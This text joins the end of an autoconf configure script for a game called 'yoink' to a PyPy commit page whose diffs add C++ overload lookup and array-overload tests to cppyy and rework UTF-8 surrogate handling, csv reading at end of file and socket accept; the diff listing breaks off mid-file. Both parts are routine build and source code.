##### liblua ##### website="http://www.lua.org/" PKG_CHECK_MODULES([LUA], [lua], [LIBS="$LIBS $LUA_LIBS" CFLAGS="$CFLAGS $LUA_CFLAGS" CXXFLAGS="$CXXFLAGS $LUA_CFLAGS"], [missing=yes AC_MSG_WARN([Missing liblua ($website)])]) ##### GTK+ 2.0 ##### if test x$gui_toolkit = xgtk then website="http://www.gtk.org/" PKG_CHECK_MODULES([GTK], [gtk+-2.0], [LIBS="$LIBS $GTK_LIBS" CFLAGS="$CFLAGS $GTK_CFLAGS" CXXFLAGS="$CXXFLAGS $GTK_CFLAGS"], [missing=yes AC_MSG_WARN([Missing GTK+-2.0 ($website)])]) fi ##### QT4 ##### if test x$gui_toolkit = xqt4 then website="http://qt.nokia.com/" PKG_CHECK_MODULES([QT4], [QtGui], [LIBS="$LIBS $QT4_LIBS" CFLAGS="$CFLAGS $QT4_CFLAGS" CXXFLAGS="$CXXFLAGS $QT4_CFLAGS"], [missing=yes AC_MSG_WARN([Missing QT4 ($website)])]) fi if test x$missing = xyes then AC_MSG_ERROR([You are missing some required libraries.]) fi #### AC_MSG_NOTICE([Checks for header files.]) #### AC_HEADER_STDBOOL AC_HEADER_STDC AC_CHECK_HEADERS([stddef.h stdint.h stdlib.h string.h unistd.h]) BOOST_SMART_PTR BOOST_STRING_ALGO BOOST_BIND BOOST_FUNCTION #### AC_MSG_NOTICE([Checks for types.]) #### AC_TYPE_UINT8_T AC_TYPE_UINT16_T AC_TYPE_UINT32_T AC_TYPE_SIZE_T AC_TYPE_SSIZE_T #### AC_MSG_NOTICE([Checks for compiler characteristics.]) #### AC_C_STRINGIZE AC_C_INLINE #### AC_MSG_NOTICE([Checks for library functions.]) #### AC_FUNC_ERROR_AT_LINE AC_FUNC_STRTOD AC_CHECK_FUNCS([nanosleep strchr strcspn strrchr strstr]) if test x$clock_gettime = xyes then AC_SEARCH_LIBS([clock_gettime], [rt], [clock_gettime=yes], [clock_gettime=no]) if test x$clock_gettime = xyes then AC_DEFINE([HAVE_CLOCK_GETTIME], 1, [Define to 1 if you have the 'clock_gettime' function.]) else AC_MSG_WARN([Falling back to SDL_GetTicks().]) fi fi # # Find the game resources to install. # DATA_FILES=$(echo $(cd data && find . -name "*.lua" \ -o -name "*.ogg" \ -o -name "*.png" \ -o -name "yoinkrc")) AC_SUBST([DATA_FILES]) # # Split the version number into components. # These definitions are used in the win32 resource file, src/yoink.rc. # VERSION_MAJOR=$(echo $VERSION | cut -d. -f1) VERSION_MINOR=$(echo $VERSION | cut -d. -f2) VERSION_REVISION=$(echo $VERSION | cut -d. -f3) AC_DEFINE_UNQUOTED([VERSION_MAJOR], [${VERSION_MAJOR:-0}], [Define to major version number component.]) AC_DEFINE_UNQUOTED([VERSION_MINOR], [${VERSION_MINOR:-0}], [Define to minor version number component.]) AC_DEFINE_UNQUOTED([VERSION_REVISION], [${VERSION_REVISION:-0}], [Define to revision version number component.]) PVERSION="${VERSION_MAJOR:-0}.${VERSION_MINOR:-0}.${VERSION_REVISION:-0}.0" AC_SUBST([PVERSION]) if githead=$(git log -n1 --date=short --pretty=format:"%h (%ad)") then AC_DEFINE_UNQUOTED([YOINK_GITHEAD], ["$githead"], [Define to the git commit currently checked out.]) fi # # Create the build files. # AC_CONFIG_FILES([Makefile data/Makefile doc/yoink.6 src/Makefile]) AC_CONFIG_HEADERS([src/config.h]) AC_OUTPUT # # Print a friendly little message. # echo "" echo " Configuration complete! :-)" echo "" echo " Host: $target" echo " Prefix: $prefix" echo " Data: $DATADIR" echo "" echo " CXX: $CXX" echo " CXXFLAGS: $(echo $CXXFLAGS)" echo " LIBS: $(echo $LIBS)" echo "" echo " To finish the installation, execute:" echo " make" echo " make install" echo ""
|
__label__pos
| 0.926941 |
1. Pypy
2. Untitled project
3. pypy
Commits
wlav committed 384e11f Merge
o) tests for array overloads
o) tests for global function overloads on lazy lookup
o) code that collects all global overloads lazily
o) merge default into branch
• Participants
• Parent commits 2cbe44d, 385b313
• Branches reflex-support
Comments (0)
Files changed (31)
File pypy/doc/config/objspace.usemodules._csv.txt
View file
+Implementation in RPython for the core of the 'csv' module
+
File pypy/jit/metainterp/optimizeopt/util.py
View file
from pypy.rlib.objectmodel import r_dict, compute_identity_hash
from pypy.rlib.rarithmetic import intmask
from pypy.rlib.unroll import unrolling_iterable
-from pypy.jit.metainterp import resoperation, history
+from pypy.jit.metainterp import resoperation
from pypy.rlib.debug import make_sure_not_resized
from pypy.jit.metainterp.resoperation import rop
+from pypy.rlib.objectmodel import we_are_translated
# ____________________________________________________________
# Misc. utilities
def make_dispatcher_method(Class, name_prefix, op_prefix=None, default=None):
ops = _findall(Class, name_prefix, op_prefix)
def dispatch(self, op, *args):
- opnum = op.getopnum()
- for value, cls, func in ops:
- if opnum == value:
- assert isinstance(op, cls)
+ if we_are_translated():
+ opnum = op.getopnum()
+ for value, cls, func in ops:
+ if opnum == value:
+ assert isinstance(op, cls)
+ return func(self, op, *args)
+ if default:
+ return default(self, op, *args)
+ else:
+ func = getattr(Class, name_prefix + op.getopname().upper(), None)
+ if func is not None:
return func(self, op, *args)
- if default:
- return default(self, op, *args)
+ if default:
+ return default(self, op, *args)
dispatch.func_name = "dispatch_" + name_prefix
return dispatch
File pypy/jit/metainterp/test/test_ajit.py
View file
y -= 1
return res
def g(x, y):
+ set_param(myjitdriver, 'max_unroll_loops', 5)
a1 = f(A(x), y)
a2 = f(A(x), y)
b1 = f(B(x), y)
File pypy/jit/metainterp/test/test_send.py
View file
import py
-from pypy.rlib.jit import JitDriver, promote, elidable
+from pypy.rlib.jit import JitDriver, promote, elidable, set_param
from pypy.jit.codewriter.policy import StopAtXPolicy
from pypy.jit.metainterp.test.support import LLJitMixin, OOJitMixin
def getvalue(self):
return self.y
def f(x, y):
+ set_param(myjitdriver, 'max_unroll_loops', 5)
if x & 1:
w = W1(x)
else:
w2 = W2(20)
def f(x, y):
+ set_param(myjitdriver, 'max_unroll_loops', 5)
if x & 1:
w = w1
else:
File pypy/module/_cffi_backend/ctypefunc.py
View file
for i, cf in enumerate(ctype.fields_list):
if cf.is_bitfield():
raise OperationError(space.w_NotImplementedError,
- space.wrap("cannot pass as argument a struct "
- "with bit fields"))
+ space.wrap("cannot pass as argument or return value "
+ "a struct with bit fields"))
ffi_subtype = self.fb_fill_type(cf.ctype, False)
if elements:
elements[i] = ffi_subtype
File pypy/module/_codecs/interp_codecs.py
View file
"ascii_encode",
"latin_1_encode",
"utf_7_encode",
- "utf_8_encode",
"utf_16_encode",
"utf_16_be_encode",
"utf_16_le_encode",
"ascii_decode",
"latin_1_decode",
"utf_7_decode",
- "utf_8_decode",
"utf_16_decode",
"utf_16_be_decode",
"utf_16_le_decode",
make_encoder_wrapper('mbcs_encode')
make_decoder_wrapper('mbcs_decode')
+# utf-8 functions are not regular, because we have to pass
+# "allow_surrogates=True"
+@unwrap_spec(uni=unicode, errors='str_or_None')
+def utf_8_encode(space, uni, errors="strict"):
+ if errors is None:
+ errors = 'strict'
+ state = space.fromcache(CodecState)
+ result = runicode.unicode_encode_utf_8(
+ uni, len(uni), errors, state.encode_error_handler,
+ allow_surrogates=True)
+ return space.newtuple([space.wrap(result), space.wrap(len(uni))])
+
+@unwrap_spec(string='bufferstr', errors='str_or_None')
+def utf_8_decode(space, string, errors="strict", w_final=False):
+ if errors is None:
+ errors = 'strict'
+ final = space.is_true(w_final)
+ state = space.fromcache(CodecState)
+ result, consumed = runicode.str_decode_utf_8(
+ string, len(string), errors,
+ final, state.decode_error_handler,
+ allow_surrogates=True)
+ return space.newtuple([space.wrap(result), space.wrap(consumed)])
+
@unwrap_spec(data=str, errors='str_or_None', byteorder=int)
def utf_16_ex_decode(space, data, errors='strict', byteorder=0, w_final=False):
if errors is None:
File pypy/module/_csv/interp_reader.py
View file
w_line = space.next(self.w_iter)
except OperationError, e:
if e.match(space, space.w_StopIteration):
- if field_builder is not None:
- raise self.error("newline inside string")
+ if (field_builder is not None and
+ state != START_RECORD and state != EAT_CRNL and
+ (len(field_builder.build()) > 0 or
+ state == IN_QUOTED_FIELD)):
+ if dialect.strict:
+ raise self.error("newline inside string")
+ else:
+ self.save_field(field_builder)
+ break
raise
self.line_num += 1
line = space.str_w(w_line)
File pypy/module/_csv/test/test_reader.py
View file
def test_dubious_quote(self):
self._read_test(['12,12,1",'], [['12', '12', '1"', '']])
+
+ def test_read_eof(self):
+ self._read_test(['a,"'], [['a', '']])
+ self._read_test(['"a'], [['a']])
+ self._read_test(['^'], [['\n']], escapechar='^')
+ self._read_test(['a,"'], 'Error', strict=True)
+ self._read_test(['"a'], 'Error', strict=True)
+ self._read_test(['^'], 'Error', escapechar='^', strict=True)
File pypy/module/_ffi/interp_funcptr.py
View file
w_restype)
addr = rffi.cast(rffi.VOIDP, addr)
func = libffi.Func(name, argtypes, restype, addr, flags)
- return W_FuncPtr(func, argtypes_w, w_restype)
+ try:
+ return W_FuncPtr(func, argtypes_w, w_restype)
+ except OSError:
+ raise OperationError(space.w_SystemError,
+ space.wrap("internal error building the Func object"))
W_FuncPtr.typedef = TypeDef(
File pypy/module/_socket/interp_socket.py
View file
info is a pair (hostaddr, port).
"""
try:
- sock, addr = self.accept(W_RSocket)
+ fd, addr = self.accept()
+ sock = rsocket.make_socket(
+ fd, self.family, self.type, self.proto, W_RSocket)
return space.newtuple([space.wrap(sock),
addr.as_object(sock.fd, space)])
except SocketError, e:
File pypy/module/cppyy/capi/__init__.py
View file
C_METHOD = _C_OPAQUE_PTR
C_INDEX = rffi.LONG
+C_INDEX_ARRAY = rffi.LONGP
WLAVC_INDEX = rffi.LONG
C_METHPTRGETTER = lltype.FuncType([C_OBJECT], rffi.VOIDP)
compilation_info=backend.eci)
def c_method_index_at(cppscope, imethod):
return _c_method_index_at(cppscope.handle, imethod)
-_c_method_index_from_name = rffi.llexternal(
- "cppyy_method_index_from_name",
- [C_SCOPE, rffi.CCHARP], C_INDEX,
+_c_method_indices_from_name = rffi.llexternal(
+ "cppyy_method_indices_from_name",
+ [C_SCOPE, rffi.CCHARP], C_INDEX_ARRAY,
threadsafe=ts_reflect,
compilation_info=backend.eci)
-def c_method_index_from_name(cppscope, name):
- return _c_method_index_from_name(cppscope.handle, name)
+def c_method_indices_from_name(cppscope, name):
+ indices = _c_method_indices_from_name(cppscope.handle, name)
+ if not indices:
+ return []
+ py_indices = []
+ i = 0
+ index = indices[i]
+ while index != -1:
+ i += 1
+ py_indices.append(index)
+ index = indices[i]
+ c_free(rffi.cast(rffi.VOIDP, indices)) # c_free defined below
+ return py_indices
_c_method_name = rffi.llexternal(
"cppyy_method_name",
File pypy/module/cppyy/include/capi.h
View file
/* method/function reflection information --------------------------------- */
int cppyy_num_methods(cppyy_scope_t scope);
cppyy_index_t cppyy_method_index_at(cppyy_scope_t scope, int imeth);
- cppyy_index_t cppyy_method_index_from_name(cppyy_scope_t scope, const char* name);
+ cppyy_index_t* cppyy_method_indices_from_name(cppyy_scope_t scope, const char* name);
char* cppyy_method_name(cppyy_scope_t scope, cppyy_index_t idx);
char* cppyy_method_result_type(cppyy_scope_t scope, cppyy_index_t idx);
File pypy/module/cppyy/interp_cppyy.py
View file
self._make_datamember(datamember_name, i)
def find_overload(self, meth_name):
- # TODO: collect all overloads, not just the non-overloaded version
- meth_idx = capi.c_method_index_from_name(self, meth_name)
- if meth_idx == -1:
+ indices = capi.c_method_indices_from_name(self, meth_name)
+ if not indices:
raise self.missing_attribute_error(meth_name)
- cppfunction = self._make_cppfunction(meth_name, meth_idx)
- overload = W_CPPOverload(self.space, self, [cppfunction])
+ cppfunctions = []
+ for meth_idx in indices:
+ f = self._make_cppfunction(meth_name, meth_idx)
+ cppfunctions.append(f)
+ overload = W_CPPOverload(self.space, self, cppfunctions)
return overload
def find_datamember(self, dm_name):
File pypy/module/cppyy/src/reflexcwrapper.cxx
View file
return (cppyy_index_t)imeth;
}
-cppyy_index_t cppyy_method_index_from_name(cppyy_scope_t handle, const char* name) {
+cppyy_index_t* cppyy_method_indices_from_name(cppyy_scope_t handle, const char* name) {
+ std::vector<cppyy_index_t> result;
Reflex::Scope s = scope_from_handle(handle);
// the following appears dumb, but the internal storage for Reflex is an
// unsorted std::vector anyway, so there's no gain to be had in using the
Reflex::Member m = s.FunctionMemberAt(imeth);
if (m.Name() == name) {
if (m.IsPublic())
- return (cppyy_index_t)imeth;
- return (cppyy_index_t)-1;
+ result.push_back((cppyy_index_t)imeth);
}
}
- return (cppyy_index_t)-1;
+ if (result.empty())
+ return (cppyy_index_t*)0;
+ cppyy_index_t* llresult = (cppyy_index_t*)malloc(sizeof(cppyy_index_t)*result.size()+1);
+ for (int i = 0; i < (int)result.size(); ++i) llresult[i] = result[i];
+ llresult[result.size()] = -1;
+ return llresult;
}
char* cppyy_method_name(cppyy_scope_t handle, cppyy_index_t method_index) {
File pypy/module/cppyy/test/overloads.cxx
View file
std::string more_overloads2::call(const dd_ol*, int) { return "dd_olptr"; }
std::string more_overloads2::call(const dd_ol&, int) { return "dd_olref"; }
+
+
+double calc_mean(long n, const float* a) { return calc_mean<float>(n, a); }
+double calc_mean(long n, const double* a) { return calc_mean<double>(n, a); }
+double calc_mean(long n, const int* a) { return calc_mean<int>(n, a); }
+double calc_mean(long n, const short* a) { return calc_mean<short>(n, a); }
+double calc_mean(long n, const long* a) { return calc_mean<long>(n, a); }
File pypy/module/cppyy/test/overloads.h
View file
class a_overload {
public:
- a_overload();
- int i1, i2;
+ a_overload();
+ int i1, i2;
};
namespace ns_a_overload {
- class a_overload {
- public:
- a_overload();
- int i1, i2;
- };
+ class a_overload {
+ public:
+ a_overload();
+ int i1, i2;
+ };
- class b_overload {
- public:
- int f(const std::vector<int>* v);
- };
+ class b_overload {
+ public:
+ int f(const std::vector<int>* v);
+ };
}
namespace ns_b_overload {
- class a_overload {
- public:
- a_overload();
- int i1, i2;
- };
+ class a_overload {
+ public:
+ a_overload();
+ int i1, i2;
+ };
}
class b_overload {
public:
- b_overload();
- int i1, i2;
+ b_overload();
+ int i1, i2;
};
class c_overload {
public:
- c_overload();
- int get_int(a_overload* a);
- int get_int(ns_a_overload::a_overload* a);
- int get_int(ns_b_overload::a_overload* a);
- int get_int(short* p);
- int get_int(b_overload* b);
- int get_int(int* p);
+ c_overload();
+ int get_int(a_overload* a);
+ int get_int(ns_a_overload::a_overload* a);
+ int get_int(ns_b_overload::a_overload* a);
+ int get_int(short* p);
+ int get_int(b_overload* b);
+ int get_int(int* p);
};
class d_overload {
public:
- d_overload();
+ d_overload();
// int get_int(void* p) { return *(int*)p; }
- int get_int(int* p);
- int get_int(b_overload* b);
- int get_int(short* p);
- int get_int(ns_b_overload::a_overload* a);
- int get_int(ns_a_overload::a_overload* a);
- int get_int(a_overload* a);
+ int get_int(int* p);
+ int get_int(b_overload* b);
+ int get_int(short* p);
+ int get_int(ns_b_overload::a_overload* a);
+ int get_int(ns_a_overload::a_overload* a);
+ int get_int(a_overload* a);
};
class more_overloads {
public:
- more_overloads();
- std::string call(const aa_ol&);
- std::string call(const bb_ol&, void* n=0);
- std::string call(const cc_ol&);
- std::string call(const dd_ol&);
+ more_overloads();
+ std::string call(const aa_ol&);
+ std::string call(const bb_ol&, void* n=0);
+ std::string call(const cc_ol&);
+ std::string call(const dd_ol&);
- std::string call_unknown(const dd_ol&);
+ std::string call_unknown(const dd_ol&);
- std::string call(double);
- std::string call(int);
- std::string call1(int);
- std::string call1(double);
+ std::string call(double);
+ std::string call(int);
+ std::string call1(int);
+ std::string call1(double);
};
class more_overloads2 {
public:
- more_overloads2();
- std::string call(const bb_ol&);
- std::string call(const bb_ol*);
+ more_overloads2();
+ std::string call(const bb_ol&);
+ std::string call(const bb_ol*);
- std::string call(const dd_ol*, int);
- std::string call(const dd_ol&, int);
+ std::string call(const dd_ol*, int);
+ std::string call(const dd_ol&, int);
};
+
+template<typename T>
+double calc_mean(long n, const T* a) {
+ double sum = 0., sumw = 0.;
+ const T* end = a+n;
+ while (a != end) {
+ sum += *a++;
+ sumw += 1;
+ }
+
+ return sum/sumw;
+}
+
+double calc_mean(long n, const float* a);
+double calc_mean(long n, const double* a);
+double calc_mean(long n, const int* a);
+double calc_mean(long n, const short* a);
+double calc_mean(long n, const long* a);
File pypy/module/cppyy/test/overloads.xml
View file
<class name="more_overloads" />
<class name="more_overloads2" />
+ <function name="calc_mean" />
+
</lcgdict>
File pypy/module/cppyy/test/overloads_LinkDef.h
View file
#pragma link C++ class more_overloads;
#pragma link C++ class more_overloads2;
+#pragma link C++ function calc_mean;
+
#endif
File pypy/module/cppyy/test/test_overloads.py
View file
currpath = py.path.local(__file__).dirpath()
test_dct = str(currpath.join("overloadsDict.so"))
-space = gettestobjspace(usemodules=['cppyy'])
+space = gettestobjspace(usemodules=['cppyy', 'array'])
def setup_module(mod):
if sys.platform == 'win32':
# assert more_overloads().call(1.) == "double"
assert more_overloads().call1(1) == "int"
assert more_overloads().call1(1.) == "double"
+
+ def test07_mean_overloads(self):
+ """Adapted test for array overloading"""
+
+ import cppyy, array
+ cmean = cppyy.gbl.calc_mean
+
+ numbers = [8, 2, 4, 2, 4, 2, 4, 4, 1, 5, 6, 3, 7]
+ mean, median = 4.0, 4.0
+
+ for l in ['f', 'd', 'i', 'h', 'l']:
+ a = array.array(l, numbers)
+ assert(round(cmean(len(a), a) - mean, 8), 0)
File pypy/objspace/std/dictmultiobject.py
View file
# Iteration
-class W_DictMultiIterKeysObject(W_Object):
+class W_BaseDictMultiIterObject(W_Object):
from pypy.objspace.std.dicttype import dictiter_typedef as typedef
_immutable_fields_ = ["iteratorimplementation"]
w_self.space = space
w_self.iteratorimplementation = iteratorimplementation
+class W_DictMultiIterKeysObject(W_BaseDictMultiIterObject):
+ pass
+
+class W_DictMultiIterValuesObject(W_BaseDictMultiIterObject):
+ pass
+
+class W_DictMultiIterItemsObject(W_BaseDictMultiIterObject):
+ pass
+
registerimplementation(W_DictMultiIterKeysObject)
-
-class W_DictMultiIterValuesObject(W_Object):
- from pypy.objspace.std.dicttype import dictiter_typedef as typedef
-
- _immutable_fields_ = ["iteratorimplementation"]
-
- ignore_for_isinstance_cache = True
-
- def __init__(w_self, space, iteratorimplementation):
- w_self.space = space
- w_self.iteratorimplementation = iteratorimplementation
-
registerimplementation(W_DictMultiIterValuesObject)
-
-class W_DictMultiIterItemsObject(W_Object):
- from pypy.objspace.std.dicttype import dictiter_typedef as typedef
-
- _immutable_fields_ = ["iteratorimplementation"]
-
- ignore_for_isinstance_cache = True
-
- def __init__(w_self, space, iteratorimplementation):
- w_self.space = space
- w_self.iteratorimplementation = iteratorimplementation
-
registerimplementation(W_DictMultiIterItemsObject)
def iter__DictMultiIterKeysObject(space, w_dictiter):
File pypy/objspace/std/ropeunicodeobject.py
View file
if result is not None:
return W_RopeObject(result)
elif encoding == "utf-8":
- result = rope.unicode_encode_utf8(node)
+ result = rope.unicode_encode_utf8(node, allow_surrogates=True)
if result is not None:
return W_RopeObject(result)
return encode_object(space, w_unistr, encoding, errors)
File pypy/objspace/std/unicodeobject.py
View file
from pypy.rlib.objectmodel import compute_hash, specialize
from pypy.rlib.objectmodel import compute_unique_id
from pypy.rlib.rstring import UnicodeBuilder
-from pypy.rlib.runicode import unicode_encode_unicode_escape
+from pypy.rlib.runicode import make_unicode_escape_function
from pypy.module.unicodedata import unicodedb
from pypy.tool.sourcetools import func_with_new_name
from pypy.rlib import jit
space.wrap("character mapping must return integer, None or unicode"))
return W_UnicodeObject(u''.join(result))
+_repr_function, _ = make_unicode_escape_function(
+ pass_printable=False, unicode_output=False, quotes=True, prefix='u')
+
def repr__Unicode(space, w_unicode):
chars = w_unicode._value
size = len(chars)
- s = unicode_encode_unicode_escape(chars, size, "strict", quotes=True)
+ s = _repr_function(chars, size, "strict")
return space.wrap(s)
def mod__Unicode_ANY(space, w_format, w_values):
File pypy/objspace/std/unicodetype.py
View file
if encoding == 'ascii':
u = space.unicode_w(w_object)
eh = encode_error_handler(space)
- return space.wrap(unicode_encode_ascii(u, len(u), None,
- errorhandler=eh))
+ return space.wrap(unicode_encode_ascii(
+ u, len(u), None, errorhandler=eh))
if encoding == 'utf-8':
u = space.unicode_w(w_object)
eh = encode_error_handler(space)
- return space.wrap(unicode_encode_utf_8(u, len(u), None,
- errorhandler=eh))
+ return space.wrap(unicode_encode_utf_8(
+ u, len(u), None, errorhandler=eh,
+ allow_surrogates=True))
from pypy.module._codecs.interp_codecs import lookup_codec
w_encoder = space.getitem(lookup_codec(space, encoding), space.wrap(0))
if errors is None:
# XXX error handling
s = space.bufferstr_w(w_obj)
eh = decode_error_handler(space)
- return space.wrap(str_decode_ascii(s, len(s), None,
- final=True,
- errorhandler=eh)[0])
+ return space.wrap(str_decode_ascii(
+ s, len(s), None, final=True, errorhandler=eh)[0])
if encoding == 'utf-8':
s = space.bufferstr_w(w_obj)
eh = decode_error_handler(space)
- return space.wrap(str_decode_utf_8(s, len(s), None,
- final=True,
- errorhandler=eh)[0])
+ return space.wrap(str_decode_utf_8(
+ s, len(s), None, final=True, errorhandler=eh,
+ allow_surrogates=True)[0])
w_codecs = space.getbuiltinmodule("_codecs")
w_decode = space.getattr(w_codecs, space.wrap("decode"))
if errors is None:
File pypy/rlib/rope.py
View file
if rope.is_bytestring():
return rope
-def unicode_encode_utf8(rope):
+def unicode_encode_utf8(rope, allow_surrogates=False):
from pypy.rlib.runicode import unicode_encode_utf_8
if rope.is_ascii():
return rope
unicode_encode_utf8(rope.right))
elif isinstance(rope, LiteralUnicodeNode):
return LiteralStringNode(
- unicode_encode_utf_8(rope.u, len(rope.u), "strict"))
+ unicode_encode_utf_8(rope.u, len(rope.u), "strict",
+ allow_surrogates=allow_surrogates))
elif isinstance(rope, LiteralStringNode):
return LiteralStringNode(_str_encode_utf_8(rope.s))
File pypy/rlib/rsocket.py
View file
"""
_mixin_ = True # for interp_socket.py
fd = _c.INVALID_SOCKET
- def __init__(self, family=AF_INET, type=SOCK_STREAM, proto=0):
+ def __init__(self, family=AF_INET, type=SOCK_STREAM, proto=0,
+ fd=_c.INVALID_SOCKET):
"""Create a new socket."""
- fd = _c.socket(family, type, proto)
+ if _c.invalid_socket(fd):
+ fd = _c.socket(family, type, proto)
if _c.invalid_socket(fd):
raise self.error_handler()
# PLAT RISCOS
addrlen_p[0] = rffi.cast(_c.socklen_t, maxlen)
return addr, addr.addr_p, addrlen_p
- def accept(self, SocketClass=None):
+ def accept(self):
"""Wait for an incoming connection.
- Return (new socket object, client address)."""
- if SocketClass is None:
- SocketClass = RSocket
+ Return (new socket fd, client address)."""
if self._select(False) == 1:
raise SocketTimeout
address, addr_p, addrlen_p = self._addrbuf()
if _c.invalid_socket(newfd):
raise self.error_handler()
address.addrlen = rffi.cast(lltype.Signed, addrlen)
- sock = make_socket(newfd, self.family, self.type, self.proto,
- SocketClass)
- return (sock, address)
+ return (newfd, address)
def bind(self, address):
"""Bind the socket to a local address."""
if res != 0:
raise self.error_handler()
+ def detach(self):
+ fd = self.fd
+ self.fd = _c.INVALID_SOCKET
+ return fd
+
if _c.WIN32:
def _connect(self, address):
"""Connect the socket to a remote address."""
File pypy/rlib/runicode.py
View file
]
def str_decode_utf_8(s, size, errors, final=False,
- errorhandler=None):
+ errorhandler=None, allow_surrogates=False):
if errorhandler is None:
errorhandler = raise_unicode_exception_decode
- return str_decode_utf_8_impl(s, size, errors, final, errorhandler)
+ return str_decode_utf_8_impl(s, size, errors, final, errorhandler,
+ allow_surrogates=allow_surrogates)
-def str_decode_utf_8_impl(s, size, errors, final, errorhandler):
+def str_decode_utf_8_impl(s, size, errors, final, errorhandler,
+ allow_surrogates):
if size == 0:
return u'', 0
if (ordch2>>6 != 0x2 or # 0b10
(ordch1 == 0xe0 and ordch2 < 0xa0)
# surrogates shouldn't be valid UTF-8!
- # Uncomment the line below to make them invalid.
- # or (ordch1 == 0xed and ordch2 > 0x9f)
+ or (not allow_surrogates and ordch1 == 0xed and ordch2 > 0x9f)
):
r, pos = errorhandler(errors, 'utf-8',
'invalid continuation byte',
result.append((chr((0x80 | ((ch >> 6) & 0x3f)))))
result.append((chr((0x80 | (ch & 0x3f)))))
-def unicode_encode_utf_8(s, size, errors, errorhandler=None):
+def unicode_encode_utf_8(s, size, errors, errorhandler=None,
+ allow_surrogates=False):
+ if errorhandler is None:
+ errorhandler = raise_unicode_exception_encode
+ return unicode_encode_utf_8_impl(s, size, errors, errorhandler,
+ allow_surrogates=allow_surrogates)
+
+def unicode_encode_utf_8_impl(s, size, errors, errorhandler,
+ allow_surrogates=False):
assert(size >= 0)
result = StringBuilder(size)
- i = 0
- while i < size:
- ch = ord(s[i])
- i += 1
+ pos = 0
+ while pos < size:
+ ch = ord(s[pos])
+ pos += 1
if ch < 0x80:
# Encode ASCII
result.append(chr(ch))
# Encode UCS2 Unicode ordinals
if ch < 0x10000:
# Special case: check for high surrogate
- if 0xD800 <= ch <= 0xDBFF and i != size:
- ch2 = ord(s[i])
- # Check for low surrogate and combine the two to
- # form a UCS4 value
- if 0xDC00 <= ch2 <= 0xDFFF:
- ch3 = ((ch - 0xD800) << 10 | (ch2 - 0xDC00)) + 0x10000
- i += 1
- _encodeUCS4(result, ch3)
+ if 0xD800 <= ch <= 0xDFFF:
+ if pos != size:
+ ch2 = ord(s[pos])
+ # Check for low surrogate and combine the two to
+ # form a UCS4 value
+ if ch <= 0xDBFF and 0xDC00 <= ch2 <= 0xDFFF:
+ ch3 = ((ch - 0xD800) << 10 | (ch2 - 0xDC00)) + 0x10000
+ pos += 1
+ _encodeUCS4(result, ch3)
+ continue
+ if not allow_surrogates:
+ r, pos = errorhandler(errors, 'utf-8',
+ 'surrogates not allowed',
+ s, pos-1, pos)
+ for ch in r:
+ if ord(ch) < 0x80:
+ result.append(chr(ord(ch)))
+ else:
+ errorhandler('strict', 'utf-8',
+ 'surrogates not allowed',
+ s, pos-1, pos)
continue
- # Fall through: handles isolated high surrogates
+ # else: Fall through and handles isolated high surrogates
result.append((chr((0xe0 | (ch >> 12)))))
result.append((chr((0x80 | ((ch >> 6) & 0x3f)))))
result.append((chr((0x80 | (ch & 0x3f)))))
- continue
else:
_encodeUCS4(result, ch)
return result.build()
return builder.build(), pos
-def unicode_encode_unicode_escape(s, size, errors, errorhandler=None, quotes=False):
- # errorhandler is not used: this function cannot cause Unicode errors
- result = StringBuilder(size)
+def make_unicode_escape_function(pass_printable=False, unicode_output=False,
+ quotes=False, prefix=None):
+ # Python3 has two similar escape functions: One to implement
+ # encode('unicode_escape') and which outputs bytes, and unicode.__repr__
+ # which outputs unicode. They cannot share RPython code, so we generate
+ # them with the template below.
+ # Python2 does not really need this, but it reduces diffs between branches.
- if quotes:
- if s.find(u'\'') != -1 and s.find(u'\"') == -1:
- quote = ord('\"')
- result.append('u"')
+ if unicode_output:
+ STRING_BUILDER = UnicodeBuilder
+ STR = unicode
+ CHR = UNICHR
+ else:
+ STRING_BUILDER = StringBuilder
+ STR = str
+ CHR = chr
+
+ def unicode_escape(s, size, errors, errorhandler=None):
+ # errorhandler is not used: this function cannot cause Unicode errors
+ result = STRING_BUILDER(size)
+
+ if quotes:
+ if prefix:
+ result.append(STR(prefix))
+ if s.find(u'\'') != -1 and s.find(u'\"') == -1:
+ quote = ord('\"')
+ result.append(STR('"'))
+ else:
+ quote = ord('\'')
+ result.append(STR('\''))
else:
- quote = ord('\'')
- result.append('u\'')
- else:
- quote = 0
+ quote = 0
- if size == 0:
- return ''
+ if size == 0:
+ return STR('')
- pos = 0
- while pos < size:
- ch = s[pos]
- oc = ord(ch)
+ pos = 0
+ while pos < size:
+ ch = s[pos]
+ oc = ord(ch)
- # Escape quotes
- if quotes and (oc == quote or ch == '\\'):
- result.append('\\')
- result.append(chr(oc))
- pos += 1
- continue
-
- # The following logic is enabled only if MAXUNICODE == 0xffff, or
- # for testing on top of a host CPython where sys.maxunicode == 0xffff
- if ((MAXUNICODE < 65536 or
- (not we_are_translated() and sys.maxunicode < 65536))
- and 0xD800 <= oc < 0xDC00 and pos + 1 < size):
- # Map UTF-16 surrogate pairs to Unicode \UXXXXXXXX escapes
- pos += 1
- oc2 = ord(s[pos])
-
- if 0xDC00 <= oc2 <= 0xDFFF:
- ucs = (((oc & 0x03FF) << 10) | (oc2 & 0x03FF)) + 0x00010000
- raw_unicode_escape_helper(result, ucs)
+ # Escape quotes
+ if quotes and (oc == quote or ch == '\\'):
+ result.append(STR('\\'))
+ result.append(CHR(oc))
pos += 1
continue
- # Fall through: isolated surrogates are copied as-is
- pos -= 1
- # Map special whitespace to '\t', \n', '\r'
- if ch == '\t':
- result.append('\\t')
- elif ch == '\n':
- result.append('\\n')
- elif ch == '\r':
- result.append('\\r')
- elif ch == '\\':
- result.append('\\\\')
+ # The following logic is enabled only if MAXUNICODE == 0xffff, or
+ # for testing on top of a host Python where sys.maxunicode == 0xffff
+ if ((MAXUNICODE < 65536 or
+ (not we_are_translated() and sys.maxunicode < 65536))
+ and 0xD800 <= oc < 0xDC00 and pos + 1 < size):
+ # Map UTF-16 surrogate pairs to Unicode \UXXXXXXXX escapes
+ pos += 1
+ oc2 = ord(s[pos])
- # Map non-printable or non-ascii to '\xhh' or '\uhhhh'
- elif oc < 32 or oc >= 0x7F:
- raw_unicode_escape_helper(result, oc)
+ if 0xDC00 <= oc2 <= 0xDFFF:
+ ucs = (((oc & 0x03FF) << 10) | (oc2 & 0x03FF)) + 0x00010000
+ char_escape_helper(result, ucs)
+ pos += 1
+ continue
+ # Fall through: isolated surrogates are copied as-is
+ pos -= 1
- # Copy everything else as-is
+ # Map special whitespace to '\t', \n', '\r'
+ if ch == '\t':
+ result.append(STR('\\t'))
+ elif ch == '\n':
